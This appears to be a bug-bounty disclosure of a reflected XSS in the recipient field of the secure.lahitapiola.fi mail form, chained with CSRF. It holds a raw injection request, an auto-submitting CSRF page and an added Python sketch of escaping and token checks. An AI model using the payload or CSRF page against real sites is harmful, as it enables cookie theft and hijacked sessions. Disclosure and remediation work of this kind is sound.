LocalTapiola: Reflected XSS+CSRF on secure.lahitapiola.fi

2018-02-09T20:18:24
ID H1:314518
Type hackerone
Reporter putsi
Modified 2018-03-02T04:01:12

Description

Basic report information

Summary: The secure.lahitapiola.fi mail application contains a reflected XSS vulnerability which can be exploited, for example, with a CSRF attack.

Description: As mentioned in the summary, the site contains a reflected cross-site scripting vulnerability. This vulnerability is present in the recipient parameter, which is used to specify the destination email address of the email.

This recipient parameter is normally not used on the first page of the email flow; however, by manually injecting it into the POST request we can introduce an email address which will be placed on the resulting HTML page as an unsanitized value.

As the same functionality lacks any CSRF protection, a CSRF page can be crafted which will trigger the reflected XSS vulnerability when opened.

Impact: The vulnerability can be used at least to do the following:

  • Create open redirects via javascript.
  • Read all cookies that are scoped to the lahitapiola domain instead of the subdomain.
  • Read cookies of the secure subdomain.
  • Maybe something else, but I'm too tired to think and will post a comment if anything new pops up.

Browsers / Apps Verified In:

  • Firefox

Steps To Reproduce:

  1. Host the attached CSRF PoC on an external server.
  2. Open the hosted file with Firefox or any other browser that does not do proper XSS sanitation.
  3. Notice that the reflected XSS triggered and ran in the context of the secure.lahitapiola.fi domain.

Additional material

Simple PoC request for the XSS:

```http
POST /index.cgi HTTP/1.1
Host: secure.lahitapiola.fi
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

sender=█████████%40rot.fi&page=2&lang=en&charset=utf-8&formsubmit=Continue&recipient=no-reply"/></noscript><script>alert(document.domain)</script>@lahitapiola.fi
```

Example attack by chaining to CSRF:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://secure.lahitapiola.fi/index.cgi" method="POST">
      <input type="hidden" name="sender" value="secure&#45;█████&#64;rot&#46;fi" />
      <input type="hidden" name="page" value="2" />
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="charset" value="utf&#45;8" />
      <input type="hidden" name="formsubmit" value="Continue" />
      <input type="hidden" name="recipient" value="no&#45;reply&quot;&#47;&gt;&lt;&#47;noscript&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;&#64;lahitapiola&#46;fi" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
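The following Python sketch is an added, defender-side illustration and is not part of the report or of the application's own code. It models the two defects the report describes: the recipient value being written into an HTML attribute without encoding, and the form being accepted without any CSRF token. The handler name `handle_form`, the server secret, the session id and the email pattern are all assumptions made for the example; the recipient value used as input is the one from the PoC request above.

```python
import hashlib
import hmac
import html
import re

# Constructed sample input: the recipient value from the report's PoC request.
PAYLOAD = 'no-reply"/></noscript><script>alert(document.domain)</script>@lahitapiola.fi'

# Deliberately strict address pattern (assumption for this example): a single
# local part, one "@", and a dotted domain with an alphabetic TLD.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def render_recipient_vulnerable(recipient: str) -> str:
    # Mirrors the defect in the report: the value is interpolated verbatim,
    # so a double quote terminates the attribute and the rest becomes markup.
    return f'<input type="hidden" name="recipient" value="{recipient}"/>'


def render_recipient_safe(recipient: str) -> str:
    # Attribute-context encoding: html.escape(quote=True) turns & < > " ' into
    # entities, so the value can no longer close the attribute or open a tag.
    return f'<input type="hidden" name="recipient" value="{html.escape(recipient, quote=True)}"/>'


def is_valid_email(value: str) -> bool:
    # Input validation as a second layer: reject anything that is not shaped
    # like a plain address before it ever reaches a template.
    return EMAIL_RE.fullmatch(value) is not None


def make_csrf_token(secret: bytes, session_id: str) -> str:
    # Token bound to the session under a server-side secret (hypothetical scheme).
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(secret: bytes, session_id: str, token: str) -> bool:
    # Constant-time comparison; an empty or missing token always fails.
    if not token:
        return False
    return hmac.compare_digest(make_csrf_token(secret, session_id), token)


def handle_form(form: dict, session_id: str, secret: bytes) -> tuple:
    """Hypothetical hardened handler for the multi-step mail form.

    Returns (status, body). The CSRF check runs first so a cross-origin POST
    is refused before any parameter is looked at; the recipient is then
    validated and, only if it passes, rendered with attribute encoding.
    """
    if not verify_csrf_token(secret, session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    recipient = form.get("recipient", "")
    if not is_valid_email(recipient):
        return 400, "invalid recipient address"
    return 200, render_recipient_safe(recipient)


if __name__ == "__main__":
    secret = b"constructed-example-secret"
    token = make_csrf_token(secret, "session-1")
    print(render_recipient_vulnerable(PAYLOAD))
    print(render_recipient_safe(PAYLOAD))
    print(handle_form({"recipient": PAYLOAD, "csrf_token": token}, "session-1", secret))
    print(handle_form({"recipient": "no-reply@lahitapiola.fi"}, "session-1", secret))
```

Either layer on its own would have stopped the PoC in the report: attribute encoding keeps the injected quote and tags inert even if validation is skipped, and the CSRF token check means a page on another origin cannot submit the form at all.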

Impact

The vulnerability can be used at least to do the following:

  • Create open redirects via javascript.
  • Read all cookies that are scoped to the lahitapiola domain instead of the subdomain.
  • Read cookies of the secure subdomain.
  • Maybe something else, but I'm too tired to think and will post a comment if anything new pops up.